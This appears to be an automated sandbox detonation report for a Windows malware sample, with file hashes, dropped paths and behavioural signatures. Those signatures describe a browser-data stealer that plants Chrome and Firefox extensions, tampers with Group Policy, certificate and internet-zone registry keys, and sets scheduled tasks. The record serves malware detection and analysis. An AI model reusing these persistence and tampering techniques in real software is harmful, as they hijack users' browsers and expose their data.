memory/1408-146-0x0000000000000000-mapping.dmp

memory/580-147-0x0000000000000000-mapping.dmp

memory/1732-148-0x0000000000000000-mapping.dmp

memory/1764-149-0x0000000000000000-mapping.dmp

memory/840-150-0x0000000000000000-mapping.dmp

memory/624-151-0x0000000000000000-mapping.dmp

memory/1724-152-0x0000000000000000-mapping.dmp

C:\Windows\Temp\grMXAHIUMHIHAuvw\frpukqJa\eqbdqfaWYhUUPtlL.wsf

MD5 f73c32784e2789168bdf6d4e8282b3aa
SHA1 9a9a9ea5ab2a6c44db84932f79bfcdbd93522857
SHA256 37043e72e29cecbd73b03dca4b9f08666284c38b6580e64f71e086ea5c9819d1
SHA512 1dd55256c32e0624df01483819d25016fdd0980bfb059f45adb1090a29db48def057c9d00bbd6cb529e7d325fb0db3858a3593b93a7a94270496f5d09ead95f9

memory/2020-155-0x0000000000000000-mapping.dmp

memory/1160-156-0x0000000000000000-mapping.dmp

memory/2008-157-0x0000000000000000-mapping.dmp

memory/1588-159-0x0000000000000000-mapping.dmp

memory/984-158-0x0000000000000000-mapping.dmp

memory/1980-160-0x0000000000000000-mapping.dmp

memory/768-161-0x0000000000000000-mapping.dmp

memory/744-162-0x0000000000000000-mapping.dmp

memory/1496-163-0x0000000000000000-mapping.dmp

memory/1864-164-0x0000000000000000-mapping.dmp

memory/1780-165-0x0000000000000000-mapping.dmp

memory/1696-166-0x0000000000000000-mapping.dmp

memory/684-167-0x0000000000000000-mapping.dmp

memory/1972-168-0x0000000000000000-mapping.dmp

memory/996-169-0x0000000000000000-mapping.dmp

memory/960-170-0x0000000000000000-mapping.dmp

memory/1204-171-0x0000000000000000-mapping.dmp

memory/1348-172-0x0000000000000000-mapping.dmp

memory/528-173-0x0000000000000000-mapping.dmp

memory/1016-174-0x0000000000000000-mapping.dmp

memory/660-175-0x0000000000000000-mapping.dmp

memory/1980-176-0x0000000000000000-mapping.dmp

memory/1084-177-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 146a1b78abbf05cde5a18d6a78b8f97e
SHA1 81a855e08c8cb5b8772f5937ee326cb295825bc4
SHA256 90a860669ef92b61559c6f338d246559f85247a31df73ec1de501cb5d16de57a
SHA512 b6a9059797894b837a8ae45f5919524144ce9c40b42b74a885ae1a69901344202133c863ee05b0587a12f63e830653b09868a3df568b9469ed33302444bfdfa3

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1504-181-0x000007FEF3F30000-0x000007FEF4953000-memory.dmp

memory/1504-182-0x000007FEF33D0000-0x000007FEF3F2D000-memory.dmp

memory/1504-183-0x0000000002944000-0x0000000002947000-memory.dmp

memory/1504-184-0x0000000002944000-0x0000000002947000-memory.dmp

memory/1504-185-0x000000000294B000-0x000000000296A000-memory.dmp

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/800-194-0x0000000000F30000-0x0000000000FB5000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-10-31 22:05

Reported

2022-10-31 22:08

Platform

win10v2004-20220812-en

Max time kernel

148s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\yOvDRBMJNKKU2\HtGLGFQ.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\psjZEUM.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\yOvDRBMJNKKU2\AhXIYJBhOvkEv.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\XYDCXZXPsTrrC\EmzDSqI.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\SvbbHukzU\FSnEmZP.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\SvbbHukzU\hIJhvE.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\afuTILY.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\XYDCXZXPsTrrC\qNmZqVV.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\nolBHjueEzUn\siwLxmt.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bLgAHCKDimrPMlxXg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bWLKrWFeqGsUKIPSIT.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\biFxKMwOTZzXEKwTU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\HvGgydgoxkjNzSQ.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000} C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
